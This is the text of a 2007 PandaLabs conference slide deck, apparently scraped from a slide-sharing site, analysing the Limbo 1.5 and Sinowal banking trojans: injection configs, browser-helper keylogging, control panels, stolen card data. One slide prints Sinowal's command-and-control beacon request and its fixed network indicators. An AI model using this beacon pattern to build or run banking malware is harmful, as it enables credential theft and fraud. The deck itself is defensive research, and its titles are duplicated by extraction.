Upload
rstsyn
View
223
Download
0
Embed Size (px)
Citation preview
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 1/20
1
Banking TargetedBanking Targeted
Attack Techniques Attack Techniques
Pedro BustamantePedro Bustamante
Sr. Research AdvisorSr. Research Advisor
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 2/20
2
Case I: Limbo 1.5Case I: Limbo 1.5
• First discovered January 20, 2007 via
“Targeted Attack Alert Services” ofPandaLabs.
• Affects multiple financial institutions.
• Now detected as Trj/Bakolimb.A
• Consists of 3 main components• Helper.XML• Helper.DLL• Control Server and Control Panel
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 3/20
3
Limbo 1.5Limbo 1.5
Helper.XML• Configuration file contains code to inject.
• Defines HTML code injection per institution
• Optional parameters (block, check, quan, content ).
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 4/20
4
Limbo 1.5Limbo 1.5
Helper.DLL
Installs as Internet Explorer Browser Helper Object (BHO)
• Monitors all browsing activity.• Monitors CortalConsors.de online broker by default.
Keylogger Functionality
• Windows Protected Storage (saved passwords).
• Deletes cookies.• Drops information in a text file.• Different dump depending on the variant.
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 5/20
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 6/20
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 7/20
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 8/20
8
Limbo 1.5Limbo 1.5
Remote Control Panel • Filter by COUNTRY, IP or UID.
• View captured logs, delete logs, execute commands, …
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 9/20
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 10/20
10
Limbo 1.5Limbo 1.5
Remote Control Panel • Infection logs and statistics.
• Approximate 2000 new infected PCs per day.
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 11/20
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 12/20
12
Limbo 1.5Limbo 1.5
Remote Control Panel • Utility to create and print credit cards.
• Stolen credit card data.
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 13/20
13
Case II:Case II: SinowalSinowal
• First discovered March 7, 2007 via “TargetedAttack Alert Services” of PandaLabs.
• Affect multiple financial institutions.
• Now detected as a Trj/Sinowal variant.
• Most interesting characteristics:• Custom-made runtime packer • Trojan-independent monitoring of bank URLs
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 14/20
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 15/20
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 16/20
16
SinowalSinowal
Remote “JIT” Monitoring Functionality
• Infected client -> malicious server
• Monitors browsing activity • Sends encrypted URL to server
• POST /gamma/x25.php? id=2E0345322FDD1D09C728CC9840F922FA&sv=53
&build=Build%20VASi &ts=1130334165 &ip=192.168.200.27
&sport=3891&hport=4011
&os=5.1.2600 &cn=Norway HTTP/1.1
• Static User-Agent: Mozilla/4.0 • Static Content-Type boundary of “--swefasvqdvwxff”
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 17/20
17
SinowalSinowal
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 18/20
18
SinowalSinowal
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 19/20
8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 20/20
20
Pedro BustamantePedro Bustamante
Sr. Research AdvisorSr. Research Advisor
Thanks !!Thanks !!Panda Research Blog:Panda Research Blog:http://research.pandasoftware.comhttp://research.pandasoftware.com
Banking TargetedBanking Targeted
Attack Techniques Attack Techniques